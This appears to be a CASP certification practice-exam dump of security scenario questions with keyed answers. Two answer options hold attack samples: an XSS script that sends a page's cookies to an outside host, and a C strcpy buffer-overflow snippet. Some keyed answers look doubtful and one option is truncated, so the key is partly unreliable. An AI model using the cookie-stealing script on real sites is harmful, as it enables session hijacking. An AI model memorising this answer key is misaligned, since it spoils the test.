CASP 1
A company is evaluating a new marketing strategy involving the use of social networking sites to reach its customers. The marketing director wants to be able to report important company news, product updates, and special promotions on the social websites. After an initial and successful pilot period, other departments want to use the social websites to post their updates as well. The Chief Information Officer (CIO) has asked the company security administrator to document three negative security impacts of allowing IT staff to post work related information on such websites. Which of the following are the major risks the security administrator should report back to the CIO? (Select THREE). A. Brute force attacks B. Malware infection C. DDOS attacks D. Phishing attacks E. SQL injection attacks F. Social engineering attacks
B. Malware infection D. Phishing attacks F. Social engineering attacks
The Chief Information Officer (CIO) comes to the security manager and asks what can be done to reduce the potential of sensitive data being emailed out of the company. Which of the following is an active security measure to protect against this threat? A. Require a digital signature on all outgoing emails. B. Sanitize outgoing content. C. Implement a data classification policy. D. Implement a SPAM filter.
B. Sanitize outgoing content.
Wireless users are reporting issues with the company's video conferencing and VoIP systems. The security administrator notices DOS attacks on the network that are affecting the company's VoIP system (i.e. premature call drops and garbled call signals). The security administrator also notices that the SIP servers are unavailable during these attacks. Which of the following security controls will MOST likely mitigate the VoIP DOS attacks on the network? (Select TWO). A. Configure 802.11b on the network B. Configure 802.1q on the network C. Configure 802.11e on the network D. Update the firewall managing the SIP servers E. Update the HIDS managing the SIP servers
C. Configure 802.11e on the network D. Update the firewall managing the SIP servers
A system administrator needs to develop a policy for when an application server is no longer needed. Which of the following policies would need to be developed? A. Backup policy B. De-provisioning policy C. Data retention policy D. Provisioning policy
C. Data retention policy
Due to a new regulation, a company has to increase active monitoring of security-related events to 24 hours a day. The security staff only has three full time employees that work during normal business hours. Instead of hiring new security analysts to cover the remaining shifts necessary to meet the monitoring requirement, the Chief Information Officer (CIO) has hired a Managed Security Service (MSS) to monitor events. Which of the following should the company do to ensure that the chosen MSS meets expectations? A. Develop a memorandum of understanding on what the MSS is responsible to provide. B. Create internal metrics to track MSS performance. C. Establish a mutually agreed upon service level agreement. D. Issue a RFP to ensure the MSS follows guidelines.
C. Establish a mutually agreed upon service level agreement.
The internal auditor at Company ABC has completed the annual audit of the company's financial system. The audit report indicates that the accounts receivable department has not followed proper record disposal procedures during a COOP/BCP tabletop exercise involving manual processing of financial transactions. Which of the following should be the Information Security Officer's (ISO's) recommendation? (Select TWO). A. Wait for the external audit results B. Perform another COOP exercise C. Implement mandatory training D. Destroy the financial transactions E. Review company procedures
C. Implement mandatory training E. Review company procedures
Employees have recently requested remote access to corporate email and shared drives. Remote access has never been offered; however, the need to improve productivity and rapidly responding to customer demands means staff now requires remote access. Which of the following controls will BEST protect the corporate network? A. Develop a security policy that defines remote access requirements. Perform regular audits of user accounts and reviews of system logs. B. Secure remote access systems to ensure shared drives are read only and access is provided through a SSL portal. Perform regular audits of user accounts and reviews of system logs. C. Plan and develop security policies based on the assumption that external environments have active hostile threats. D. Implement a DLP program to log data accessed by users connecting via remote access. Regularly perform user revalidation.
C. Plan and develop security policies based on the assumption that external environments have active hostile threats.
A company has purchased a new system, but security personnel are spending a great deal of time on system maintenance. A new third party vendor has been selected to maintain and manage the company's system. Which of the following document types would need to be created before any work is performed? A. IOS B. ISA C. SLA D. OLA
C. SLA
Based on the results of a recent audit, a company rolled out a standard computer image in an effort to provide consistent security configurations across all computers. Which of the following controls provides the GREATEST level of certainty that unauthorized changes are not occurring? A. Schedule weekly vulnerability assessments B. Implement continuous log monitoring C. Scan computers weekly against the baseline D. Require monthly reports showing compliance with configuration and updates
C. Scan computers weekly against the baseline
SDLC is being used for the commissioning of a new platform. To provide an appropriate level of assurance the security requirements that were specified at the project origin need to be carried through to implementation. Which of the following would BEST help to determine if this occurred? A. Requirements workshop B. Security development lifecycle (SDL) C. Security requirements traceability matrix (SRTM) D. Secure code review and penetration test
C. Security requirements traceability matrix (SRTM)
A network engineer at Company ABC observes the following raw HTTP request: GET /disp_reports.php?SectionEntered=57&GroupEntered=-1&report_type=alerts&to_date=01- 01-0101&Run= Run&UserEntered=dsmith&SessionID=5f04189bc&from_date=31-10-2010&TypesEntered=1 HTTP/1.1 Host: test.example.net Accept: */* Accept-Language: en Connection: close Cookie: java14=1; java15=1; java16=1; js=1292192278001; Which of the following should be the engineer's GREATEST concern? A. The HTTPS is not being enforced so the system is vulnerable. B. The numerical encoding on the session ID is limited to hexadecimal characters, making it susceptible to a brute force attack. C. Sensitive data is transmitted in the URL. D. The dates entered are outside a normal range, which may leave the system vulnerable to a denial of service attack.
C. Sensitive data is transmitted in the URL.
A security administrator has been conducting a security assessment of Company XYZ for the past two weeks. All of the penetration tests and other assessments have revealed zero flaws in the systems at Company XYZ. However, Company XYZ reports that it has been the victim of numerous security incidents in the past six months. In each of these incidents, the criminals have managed to exfiltrate large volumes of data from the secure servers at the company. Which of the following techniques should the investigation team consider in the next phase of their assessment in hopes of uncovering the attack vector the criminals used? A. Vulnerability assessment B. Code review C. Social engineering D. Reverse engineering
C. Social engineering
A telecommunication company has recently upgraded their teleconference systems to multicast. Additionally, the security team has instituted a new policy which requires VPN to access the company's video conference. All parties must be issued a VPN account and must connect to the company's VPN concentrator to participate in the remote meetings. Which of the following settings will increase bandwidth utilization on the VPN concentrator during the remote meetings? A. IPSec transport mode is enabled B. ICMP is disabled C. Split tunneling is disabled D. NAT-traversal is enabled
C. Split tunneling is disabled
Which of the following should be used with caution because of its ability to provide access to block level data instead of file level data? A. CIFS B. NFS C. iSCSI D. NAS
C. iSCSI
Which of the following displays an example of a XSS attack? A. <SCRIPT> document.location='http://site.comptia/cgi-bin/script.cgi?'+document.cookie </SCRIPT> B. Checksums-Sha1:7be9e9bac3882beab1abb002bb5cd2302c76c48d 1157 xfig_3.2.5.b-1.dsc e0e3c9a9df6fac8f1536c2209025577edb1d1d9e 5770796 xfig_3.2.5.b.orig.tar.gz d474180fbeb6955e79bfc67520ad775a87b68d80 46856 xfig_3.2.5.b-1.diff.gz ddcba53dffd08e5d37492fbf99fe93392943c7b0 3363512 xfig-doc_3.2.5.b-1_all.deb 7773821c1a925978306d6c75ff5c579b018a2ac6 1677778 xfig-libs_3.2.5.b-1_all.deb b26c18cfb2ee2dc071b0e3bed6205c1fc0655022 739228 xfig_3.2.5.b-1_amd64.deb C. <form action="/cgi-bin/login" method=post> Username: <input type=text name=username> PassworD.<input type=password name=password> <input type=submit value=Login> D. #include char *code = "AAAABBBBCCCCDDD"; //including the character '\0' size = 16 bytes void main() {char buf[8]; strcpy(buf, code); }
A. <SCRIPT> document.location='http://site.comptia/cgi-bin/script.cgi?'+document.cookie </SCRIPT>
The helpdesk is receiving multiple calls about slow and intermittent Internet access from the finance department. The network administrator reviews the tickets and compiles the following information for the security administrator: ------ Caller 1, IP 172.16.35.217, NETMASK 255.255.254.0 Caller 2, IP 172.16.35.53, NETMASK 255.255.254.0 Caller 3, IP 172.16.35.173, NETMASK 255.255.254.0 All callers are connected to the same switch and are routed by a router with five built-in interfaces. The upstream router interface's MAC is 00-01-42-32-ab-1a ------ The security administrator brings a laptop to the finance office, connects it to one of the wall jacks, starts up a network analyzer, and notices the following: 09:05:10.937590 arp reply 172.16.34.1 is-at 0:12:3f:f1:da:52 (0:12:3f:f1:da:52) 09:05:15.934840 arp reply 172.16.34.1 is-at 0:12:3f:f1:da:52 (0:12:3f:f1:da:52) 09:05:19.931482 arp reply 172.16.34.1 is-at 0:12:3f:f1:da:52 (0:12:3f:f1:da:52) Which of the following can the security administrator determine from the above information? A. A man in the middle attack is underway - implementing static ARP entries is a possible solution. B. An ARP flood attack targeted at the router is causing intermittent communication - implementing IPS is a possible solution. C. The default gateway is being spoofed - implementing static routing with MD5 is a possible solution. D. The router is being advertised on a separate network - router reconfiguration is a possible solution.
A. A man in the middle attack is underway - implementing static ARP entries is a possible solution.
A security manager at Company ABC, needs to perform a risk assessment of a new mobile device which the Chief Information Officer (CIO) wants to immediately deploy to all employees in the company. The product is commercially available, runs a popular mobile operating system, and can connect to IPv6 networks wirelessly. The model the CIO wants to procure also includes the upgraded 160GB solid state hard drive. The producer of the device will not reveal exact numbers but experts estimate that over 73 million of the devices have been sold worldwide. Which of the following is the BEST list of factors the security manager should consider while performing a risk assessment? A. Ability to remotely wipe the devices, apply security controls remotely, and encrypt the SSD; the track record of the vendor in publicizing and correcting security flaws in their products; predicted costs associated with maintaining, integrating and securing the devices. B. Ability to remotely administer the devices, apply security controls remotely, and remove the SSD; the track record of the vendor in securely implementing IPv6 with IPSec; predicted costs associated with securing the devices. C. Ability to remotely monitor the devices, remove security controls remotely, and decrypt the SSD; the track record of the vendor in publicizing and preventing security flaws in their products; predicted costs associated with maintaining, destroying and tracking the devices. D. Ability to remotely sanitize the devices, apply security controls locally, encrypt the SSD; the track record of the vendor in adapting the open source operating system to their platform; predicted costs associated with inventory management, maintaining, integrating and securing the devices.
A. Ability to remotely wipe the devices, apply security controls remotely, and encrypt the SSD; the track record of the vendor in publicizing and correcting security flaws in their products; predicted costs associated with maintaining, integrating and securing the devices.
After implementing port security, restricting all network traffic into and out of a network, migrating to IPv6, installing NIDS, firewalls, spam and application filters, a security administer is convinced that the network is secure. The administrator now focuses on securing the hosts on the network, starting with the servers. Which of the following is the MOST complete list of end-point security software the administrator could plan to implement? A. Anti-malware/virus/spyware/spam software, as well as a host based firewall and strong, twofactor authentication. B. Anti-virus/spyware/spam software, as well as a host based IDS, firewall, and strong three-factor authentication. C. Anti-malware/virus/spyware/spam software, as well as a host based firewall and biometric authentication. D. Anti-malware/spam software, as well as a host based firewall and strong, three-factor authentication.
A. Anti-malware/virus/spyware/spam software, as well as a host based firewall and strong, twofactor authentication.
A data breach occurred which impacted the HR and payroll system. It is believed that an attack from within the organization resulted in the data breach. Which of the following should be performed FIRST after the data breach occurred? A. Assess system status B. Restore from backup tapes C. Conduct a business impact analysis D. Review NIDS logs
A. Assess system status
The Chief Executive Officer (CEO) has decided to outsource systems which are not core business functions; however, a recent review by the risk officer has indicated that core business functions are dependent on the outsourced systems. The risk officer has requested that the IT department calculates the priority of restoration for all systems and applications under the new business model. Which of the following is the BEST tool to achieve this? A. Business impact analysis B. Annualized loss expectancy analysis C. TCO analysis D. Residual risk and gap analysis
A. Business impact analysis
A replacement CRM has had its business case approved. In preparation for a requirements workshop, an architect is working with a business analyst to ensure that appropriate security requirements have been captured. Which of the following documents BEST captures the security requirements? A. Business requirements document B. Requirements traceability matrix document C. Use case and viewpoints document D. Solution overview document
A. Business requirements document
On Monday, the Chief Information Officer (CIO) of a state agency received an e-discovery request for the release of all emails sent and received by the agency board of directors for the past five years. The CIO has contacted the email administrator and asked the administrator to provide the requested information by end of day on Friday. Which of the following has the GREATEST impact on the ability to fulfill the e-discovery request? A. Data retention policy B. Backup software and hardware C. Email encryption software D. Data recovery procedures
A. Data retention policy
A security analyst at Company A has been trying to convince the Information Security Officer (ISO) to allocate budget towards the purchase of a new intrusion prevention system (IPS) capable of analyzing encrypted web transactions. Which of the following should the analyst provide to the ISO to support the request? (Select TWO). A. Emerging threat reports B. Company attack tends C. Request for Quote (RFQ) D. Best practices E. New technologies report
A. Emerging threat reports B. Company attack tends
A security manager has provided a Statement of Work (SOW) to an external penetration testing firm for a web application security test. The web application starts with a very simple HTML survey form with two components: a country selection dropdown list and a submit button. The penetration testers are required to provide their test cases for this survey form in advance. In order to adequately test the input validation of the survey form, which of the following tools would be the BEST tool for the technician to use? A. HTTP interceptor B. Vulnerability scanner C. Port scanner D. Fuzzer
A. HTTP interceptor
The Chief Executive Officer (CEO) of a corporation purchased the latest mobile device and wants to connect it to the internal network. The Chief Information Security Officer (CISO) was told to research and recommend how to secure this device. Which of the following should be implemented, keeping in mind that the CEO has stated that this access is required? A. Mitigate and Transfer B. Accept and Transfer C. Transfer and Avoid D. Avoid and Mitigate
A. Mitigate and Transfer
An online banking application has had its source code updated and is soon to be re-launched. The underlying infrastructure has not been changed. In order to ensure that the application has an appropriate security posture, several security-related activities are required. Which of the following security activities should be performed to provide an appropriate level of security testing coverage? (Select TWO). A. Penetration test across the application with accounts of varying access levels (i.e. nonauthenticated, authenticated, and administrative users). B. Code review across critical modules to ensure that security defects, Trojans, and backdoors are not present. C. Vulnerability assessment across all of the online banking servers to ascertain host and container configuration lock-down and patch levels. D. Fingerprinting across all of the online banking servers to ascertain open ports and services. E. Black box code review across the entire code base to ensure that there are no security defects present.
A. Penetration test across the application with accounts of varying access levels (i.e. nonauthenticated, authenticated, and administrative users). B. Code review across critical modules to ensure that security defects, Trojans, and backdoors are not present.
The security administrator is worried about possible SPIT attacks against the VoIP system. Which of the following security controls would MOST likely need to be implemented to detect this type of attack? A. SIP and SRTP traffic analysis B. QoS audit on Layer 3 devices C. IP and MAC filtering logs D. Email spam filter log
A. SIP and SRTP traffic analysis
The company is about to upgrade a financial system through a third party, but wants to legally ensure that no sensitive information is compromised throughout the project. The project manager must also make sure that internal controls are set to mitigate the potential damage that one individual's actions may cause. Which of the following needs to be put in place to make certain both organizational requirements are met? (Select TWO). A. Separation of duties B. Forensic tasks C. MOU D. OLA E. NDA F. Job rotation
A. Separation of duties E. NDA
A production server has been compromised. Which of the following is the BEST way to preserve the non-volatile evidence? A. Shut the server down and image the hard drive. B. Remove all power sources from the server. C. Install remote backup software and copy data to write-once media. D. Login remotely and perform a full backup of the server.
A. Shut the server down and image the hard drive.
Which of the following is true about an unauthenticated SAMLv2 transaction? A. The browser asks the SP for a resource. The SP provides the browser with an XHTML format. The browser asks the IdP to validate the user, and then provides the XHTML back to the SP for access. B. The browser asks the IdP for a resource. The IdP provides the browser with an XHTML format. The browser asks the SP to validate the user, and then provides the XHTML to the IdP for access. C. The browser asks the IdP to validate the user. The IdP sends an XHTML form to the SP and a cookie to the browser. The browser asks for a resource to the SP, which verifies the cookie and XHTML format for access. D. The browser asks the SP to validate the user. The SP sends an XHTML form to the IdP. The IdP provides the XHTML form back to the SP, and then the browser asks the SP for a resource.
A. The browser asks the SP for a resource. The SP provides the browser with an XHTML format. The browser asks the IdP to validate the user, and then provides the XHTML back to the SP for access.
A newly-appointed risk management director for the IT department at Company XYZ, a major pharmaceutical manufacturer, needs to conduct a risk analysis regarding a new system which the developers plan to bring on-line in three weeks. The director begins by reviewing the thorough and well-written report from the independent contractor who performed a security assessment of the system. The report details what seems to be a manageable volume of infrequently exploited security vulnerabilities. The likelihood of a malicious attacker exploiting one of the vulnerabilities is low; however, the director still has some reservations about approving the system because of which of the following? A. The resulting impact of even one attack being realized might cripple the company financially. B. Government health care regulations for the pharmaceutical industry prevent the director from approving a system with vulnerabilities. C. The director is new and is being rushed to approve a project before an adequate assessment has been performed. D. The director should be uncomfortable accepting any security vulnerabilities and should find time to correct them before the system is deployed.
A. The resulting impact of even one attack being realized might cripple the company financially.
A security administrator has finished building a Linux server which will host multiple virtual machines through hypervisor technology. Management of the Linux server, including monitoring server performance, is achieved through a third party web enabled application installed on the Linux server. The security administrator is concerned about vulnerabilities in the web application that may allow an attacker to retrieve data from the virtual machines. Which of the following will BEST protect the data on the virtual machines from an attack? A. The security administrator must install the third party web enabled application in a chroot environment. B. The security administrator must install a software firewall on both the Linux server and the virtual machines. C. The security administrator must install anti-virus software on both the Linux server and the virtual machines. D. The security administrator must install the data exfiltration detection software on the perimeter firewall.
A. The security administrator must install the third party web enabled application in a chroot environment.
Driven mainly by cost, many companies outsource computing jobs which require a large amount of processor cycles over a short duration to cloud providers. This allows the company to avoid a large investment in computing resources which will only be used for a short time. Assuming the provisioned resources are dedicated to a single company, which of the following is the MAIN vulnerability associated with on-demand provisioning? A. Traces of proprietary data which can remain on the virtual machine and be exploited B. Remnants of network data from prior customers on the physical servers during a compute job C. Exposure of proprietary data when in-transit to the cloud provider through IPSec tunnels D. Failure of the de-provisioning mechanism resulting in excessive charges for the resources
A. Traces of proprietary data which can remain on the virtual machine and be exploited
A company currently does not use any type of authentication or authorization service for remote access. The new security policy states that all remote access must be locked down to only authorized personnel. The policy also dictates that only authorized external networks will be allowed to access certain internal resources. Which of the following would MOST likely need to be implemented and configured on the company's perimeter network to comply with the new security policy? (Select TWO). A. VPN concentrator B. Firewall C. Proxy server D. WAP E. Layer 2 switch
A. VPN concentrator B. Firewall
A security architect is assigned to a major software development project. The software development team has a history of writing bug prone, inefficient code, with multiple security flaws in every release. The security architect proposes implementing secure coding standards to the project manager. The secure coding standards will contain detailed standards for: A. error handling, input validation, memory use and reuse, race condition handling, commenting, and preventing typical security problems. B. error prevention, requirements validation, memory use and reuse, commenting typical security problems, and testing code standards. C. error elimination, trash collection, documenting race conditions, peer review, and typical security problems. D. error handling, input validation, commenting, preventing typical security problems, managing customers, and documenting extra requirements.
A. error handling, input validation, memory use and reuse, race condition handling, commenting, and preventing typical security problems.
Company Z is merging with Company A to expand its global presence and consumer base. This purchase includes several offices in different countries. To maintain strict internal security and compliance requirements, all employee activity may be monitored and reviewed. Which of the following would be the MOST likely cause for a change in this practice? A. The excessive time it will take to merge the company's information systems. B. Countries may have different legal or regulatory requirements. C. Company A might not have adequate staffing to conduct these reviews. D. The companies must consolidate security policies during the merger.
B. Countries may have different legal or regulatory requirements.
An internal employee has sold a copy of the production customer database that was being used for upgrade testing to outside parties via HTTP file upload. The Chief Information Officer (CIO) has resigned and the Chief Executive Officer (CEO) has tasked the incoming CIO with putting effective controls in place to help prevent this from occurring again in the future. Which of the following controls is the MOST effective in preventing this threat from re-occurring? A. Network-based intrusion prevention system B. Data loss prevention C. Host-based intrusion detection system D. Web application firewall
B. Data loss prevention
The Chief Executive Officer (CEO) of a corporation decided to move all email to a cloud computing environment. The Chief Information Security Officer (CISO) was told to research the risk involved in this environment. Which of the following measures should be implemented to minimize the risk of hosting email in the cloud? A. Remind users that all emails with sensitive information need be encrypted and physically inspect the cloud computing. B. Ensure logins are over an encrypted channel and obtain an NDA and an SLA from the cloud provider. C. Ensure logins are over an encrypted channel and remind users to encrypt all emails that contain sensitive information. D. Obtain an NDA from the cloud provider and remind users that all emails with sensitive information need be encrypted.
B. Ensure logins are over an encrypted channel and obtain an NDA and an SLA from the cloud provider.
The company's marketing department needs to provide more real-time interaction with its partners and consumers and decides to move forward with a presence on multiple social networking sites for sharing information. Which of the following minimizes the potential exposure of proprietary information? A. Require each person joining the company's social networking initiative to accept a nondisclosure agreement. B. Establish a specific set of trained people that can release information on the organization's behalf. C. Require a confidential statement be attached to all information released to the social networking sites. D. Establish a social media usage policy and provide training to all marketing employees.
B. Establish a specific set of trained people that can release information on the organization's behalf.
As part of the testing phase in the SDLC, a software developer wants to verify that an application is properly handling user error exceptions. Which of the following is the BEST tool or process for the developer use? A. SRTM review B. Fuzzer C. Vulnerability assessment D. HTTP interceptor
B. Fuzzer
An employee was terminated and promptly escorted to their exit interview, after which the employee left the building. It was later discovered that this employee had started a consulting business using screen shots of their work at the company which included live customer data. This information had been removed through the use of a USB device. After this incident, it was determined a process review must be conducted to ensure this issue does not recur. Which of the following business areas should primarily be involved in this discussion? (Select TWO). A. Database Administrator B. Human Resources C. Finance D. Network Administrator E. IT Management
B. Human Resources E. IT Management
An IT administrator has installed new DNS name servers (Primary and Secondary), which are used to host the company MX records and resolve the web server's public address. In order to secure the zone transfer between the primary and secondary server, the administrator uses only server ACLs. Which of the following attacks could the secondary DNS server still be susceptible to? A. Email spamming B. IP spoofing C. Clickjacking D. DNS replication
B. IP spoofing
Company ABC has recently completed the connection of its network to a national high speed private research network. Local businesses in the area are seeking sponsorship from Company ABC to connect to the high speed research network by directly connecting through Company ABC's network. Company ABC's Chief Information Officer (CIO) believes that this is an opportunity to increase revenues and visibility for the company, as well as promote research and development in the area. Which of the following must Company ABC require of its sponsored partners in order to document the technical security requirements of the connection? A. SLA B. ISA C. NDA D. BPA
B. ISA
A corporate executive lost their smartphone while on an overseas business trip. The phone was equipped with file encryption and secured with a strong passphrase. The phone contained over 60GB of proprietary data. Given this scenario, which of the following is the BEST course of action? A. File an insurance claim and assure the executive the data is secure because it is encrypted. B. Immediately implement a plan to remotely wipe all data from the device. C. Have the executive change all passwords and issue the executive a new phone. D. Execute a plan to remotely disable the device and report the loss to the police.
B. Immediately implement a plan to remotely wipe all data from the device.
A company has decided to use the SDLC for the creation and production of a new information system. The security administrator is training all users on how to protect company information while using the new system, along with being able to recognize social engineering attacks. Senior Management must also formally approve of the system prior to it going live. In which of the following phases would these security controls take place? A. Operations and Maintenance B. Implementation C. Acquisition and Development D. Initiation
B. Implementation
The IT department of a pharmaceutical research company is considering whether the company should allow or block access to social media websites during lunch time. The company is considering the possibility of allowing access only through the company's guest wireless network, which is logically separated from the internal research network. The company prohibits the use of personal devices; therefore, such access will take place from company owned laptops. Which of the following is the HIGHEST risk to the organization? A. Employee's professional reputation B. Intellectual property confidentiality loss C. Downloaded viruses on the company laptops D. Workstation compromise affecting availability
B. Intellectual property confidentiality loss
A company has decided to relocate and the security manager has been tasked to perform a site survey of the new location to help in the design of the physical infrastructure. The current location has video surveillance throughout the building and entryways. The following requirements must be met: Able to log entry of all employees in and out of specific areas Access control into and out of all sensitive areas Tailgating prevention Which of the following would MOST likely be implemented to meet the above requirements and provide a secure solution? (Select TWO). A. Discretionary Access control B. Man trap C. Visitor logs D. Proximity readers E. Motion detection sensors
B. Man trap D. Proximity readers
A small company has a network with 37 workstations, 3 printers, a 48 port switch, an enterprise class router, and a firewall at the boundary to the ISP. The workstations have the latest patches and all have up-to-date anti-virus software. User authentication is a two-factor system with fingerprint scanners and passwords. Sensitive data on each workstation is encrypted. The network is configured to use IPv4 and is a standard Ethernet network. The network also has a captive portal based wireless hot-spot to accommodate visitors. Which of the following is a problem with the security posture of this company? A. No effective controls in place B. No transport security controls are implemented C. Insufficient user authentication controls are implemented D. IPv6 is not incorporated in the network
B. No transport security controls are implemented
A technician states that workstations that are on the network in location B are unable to validate certificates, while workstations that are on the main location A's network are having no issues. Which of the following methods allows a certificate to be validated by a single server that returns the validity of that certificate? A. XACML B. OCSP C. ACL D. CRL
B. OCSP
A number of security incidents have been reported involving mobile web-based code developed by a consulting company. Performing a root cause analysis, the security administrator of the consulting company discovers that the problem is a simple programming error that results in extra information being loaded into the memory when the proper format is selected by the user. After repeating the process several times, the security administrator is able to execute unintentional instructions through this method. Which of the following BEST describes the problem that is occurring, a good mitigation technique to use to prevent future occurrences, and why it a security concern? A. Problem: Cross-site scripting Mitigation Technique. Input validation Security Concern: Decreases the company's profits and cross-site scripting can enable malicious actors to compromise the confidentiality of network connections or interrupt the availability of the network. B. Problem: Buffer overflow Mitigation Technique: Secure coding standards Security Concern: Exposes the company to liability buffer overflows and can enable malicious actors to compromise the confidentiality/availability of the data. C. Problem: SQL injection Mitigation Technique: Secure coding standards Security Concern: Exposes the company to liability SQL injection and can enable malicious actors to compromise the confidentiality of data or interrupt the availability of a system. D. Problem: Buffer overflow Mitigation Technique: Output validation Security Concern: Exposing the company to public scrutiny buffer overflows can enable malicious actors to interrupt the availability of a system.
B. Problem: Buffer overflow Mitigation Technique: Secure coding standards Security Concern: Exposes the company to liability buffer overflows and can enable malicious actors to compromise the confidentiality/availability of the data.
A company has asked their network engineer to list the major advantages for implementing a virtual environment in regards to cost. Which of the following would MOST likely be selected? A. Ease of patch testing B. Reducing physical footprint C. Reduced network traffic D. Isolation of applications
B. Reducing physical footprint
Within a large organization, the corporate security policy states that personal electronic devices are not allowed to be placed on the company network. There is considerable pressure from the company board to allow smartphones to connect and synchronize email and calendar items of board members and company executives. Which of the following options BEST balances the security and usability requirements of the executive management team? A. Allow only the executive management team the ability to use personal devices on the company network, as they have important responsibilities and need convenient access. B. Review the security policy. Perform a risk evaluation of allowing devices that can be centrally managed, remotely disabled, and have device-level encryption of sensitive data. C. Stand firm on disallowing non-company assets from connecting to the network as the assets may lead to undesirable security consequences, such as sensitive emails being leaked outside the company. D. Allow only certain devices that are known to have the ability of being centrally managed. Do not allow any other smartphones until the device is proven to be centrally managed.
B. Review the security policy. Perform a risk evaluation of allowing devices that can be centrally managed, remotely disabled, and have device-level encryption of sensitive data.
Which of the following can aid a buffer overflow attack to execute when used in the creation of applications? A. Secure cookie storage B. Standard libraries C. State management D. Input validation
B. Standard libraries
After a security incident, an administrator revokes the SSL certificate for their web server www.company.com. Later, users begin to inform the help desk that a few other servers are generating certificate errors: ftp.company.com, mail.company.com, and partners.company.com. Which of the following is MOST likely the reason for this? A. Each of the servers used the same EV certificate. B. The servers used a wildcard certificate. C. The web server was the CA for the domain. D. Revoking a certificate can only be done at the domain level.
B. The servers used a wildcard certificate.
The security administrator has been tasked with providing a solution that would not only eliminate the need for physical desktops, but would also centralize the location of all desktop applications, without losing physical control of any network devices. Which of the following would the security manager MOST likely implement? A. VLANs B. VDI C. PaaS D. IaaS
B. VDI
Which of the following displays an example of a buffer overflow attack? A. <SCRIPT> document.location='http://site.comptia/cgi-bin/script.cgi?'+document.cookie </SCRIPT> B. Checksums-Sha1:7be9e9bac3882beab1abb002bb5cd2302c76c48d 1157 xfig_3.2.5.b-1.dsc e0e3c9a9df6fac8f1536c2209025577edb1d1d9e 5770796 xfig_3.2.5.b.orig.tar.gz d474180fbeb6955e79bfc67520ad775a87b68d80 46856 xfig_3.2.5.b-1.diff.gz ddcba53dffd08e5d37492fbf99fe93392943c7b0 3363512 xfig-doc_3.2.5.b-1_all.deb 7773821c1a925978306d6c75ff5c579b018a2ac6 1677778 xfig-libs_3.2.5.b-1_all.deb b26c18cfb2ee2dc071b0e3bed6205c1fc0655022 739228 xfig_3.2.5.b-1_amd64.deb C. #include char *code = "AAAABBBBCCCCDDD"; //including the character '\0' size = 16 bytes void main() {char buf[8]; strcpy(buf, code); } D. <form action="/cgi-bin/login" method=post> Username: <input type=text name=username> PassworD.<input type=password name=password> <input type=submit value=Login>
C. #include char *code = "AAAABBBBCCCCDDD"; //including the character '\0' size = 16 bytes void main() {char buf[8]; strcpy(buf, code); }
A breach at a government agency resulted in the public release of top secret information. The Chief Information Security Officer has tasked a group of security professionals to deploy a system which will protect against such breaches in the future. Which of the following can the government agency deploy to meet future security needs? A. A DAC which enforces no read-up, a DAC which enforces no write-down, and a MAC which uses an access matrix. B. A MAC which enforces no write-up, a MAC which enforces no read-down, and a DAC which uses an ACL. C. A MAC which enforces no read-up, a MAC which enforces no write-down, and a DAC which uses an access matrix. D. A DAC which enforces no write-up, a DAC which enforces no read-down, and a MAC which
C. A MAC which enforces no read-up, a MAC which enforces no write-down, and a DAC which uses an access matrix.
A company provides on-demand virtual computing for a sensitive project. The company implements a fully virtualized datacenter and terminal server access with two-factor authentication for access to sensitive data. The security administrator at the company has uncovered a breach in data confidentiality. Sensitive data was found on a hidden directory within the hypervisor. Which of the following has MOST likely occurred? A. A stolen two factor token and a memory mapping RAM exploit were used to move data from one virtual guest to an unauthorized similar token. B. An employee with administrative access to the virtual guests was able to dump the guest memory onto their mapped disk. C. A host server was left un-patched and an attacker was able to use a VMEscape attack to gain unauthorized access. D. A virtual guest was left un-patched and an attacker was able to use a privilege escalation attack to gain unauthorized access.
C. A host server was left un-patched and an attacker was able to use a VMEscape attack to gain unauthorized access.
A new project initiative involves replacing a legacy core HR system, and is expected to touch many major operational systems in the company. A security administrator is engaged in the project to provide security consulting advice. In addition, there are database, network, application, HR, and transformation management consultants engaged on the project as well. The administrator has established the security requirements. Which of the following is the NEXT logical step? A. Document the security requirements in an email and move on to the next most urgent task. B. Organize for a requirements workshop with the non-technical project members, being the HR and transformation management consultants. C. Communicate the security requirements with all stakeholders for discussion and buy-in. D. Organize for a requirements workshop with the technical project members, being the database, network, and application consultants.
C. Communicate the security requirements with all stakeholders for discussion and buy-in
An organization must comply with a new regulation that requires the organization to determine if an external attacker is able to gain access to its systems from outside the network. Which of the following should the company conduct to meet the regulation's criteria? A. Conduct a compliance review B. Conduct a vulnerability assessment C. Conduct a black box penetration test D. Conduct a full system audit
C. Conduct a black box penetration test
A company is developing a new web application for its Internet users and is following a secure coding methodology. Which of the following methods would BEST assist the developers in determining if any unknown vulnerabilities are present? A. Conduct web server load tests. B. Conduct static code analysis. C. Conduct fuzzing attacks. D. Conduct SQL injection and XSS attacks.
C. Conduct fuzzing attacks.
The security administrator at a bank is receiving numerous reports that customers are unable to login to the bank website. Upon further investigation, the security administrator discovers that the name associated with the bank website points to an unauthorized IP address. Which of the following solutions will MOST likely mitigate this type of attack? A. Security awareness and user training B. Recursive DNS from the root servers C. Configuring and deploying TSIG D. Firewalls and IDS technologies
C. Configuring and deploying TSIG
The Chief Executive Officer (CEO) of a corporation purchased the latest mobile device and wants to connect it to the company's internal network. The Chief Information Security Officer (CISO) was told to research and recommend how to secure this device. Which of the following recommendations should be implemented to keep the device from posing a security risk to the company? A. A corporate policy to prevent sensitive information from residing on a mobile device and antivirus software. B. Encryption of the non-volatile memory and a corporate policy to prevent sensitive information from residing on a mobile device. C. Encryption of the non-volatile memory and a password or PIN to access the device. D. A password or PIN to access the device and a corporate policy to prevent sensitive information from residing on a mobile device.
C. Encryption of the non-volatile memory and a password or PIN to access the device.
A manufacturing company is having issues with unauthorized access and modification of the controls operating the production equipment. A communication requirement is to allow the free flow of data between all network segments at the site. Which of the following BEST remediates the issue? A. Implement SCADA security measures. B. Implement NIPS to prevent the unauthorized activity. C. Implement an AAA solution. D. Implement a firewall to restrict access to only a single management station.
C. Implement an AAA solution.
A small bank is introducing online banking to its customers through its new secured website. The firewall has three interfaces: one for the Internet connection, another for the DMZ, and the other for the internal network. Which of the following will provide the MOST protection from all likely attacks on the bank? A. Implement NIPS inline between the web server and the firewall. B. Implement a web application firewall inline between the web server and the firewall. C. Implement host intrusion prevention on all machines at the bank. D. Configure the firewall policy to only allow communication with the web server using SSL.
C. Implement host intrusion prevention on all machines at the bank.
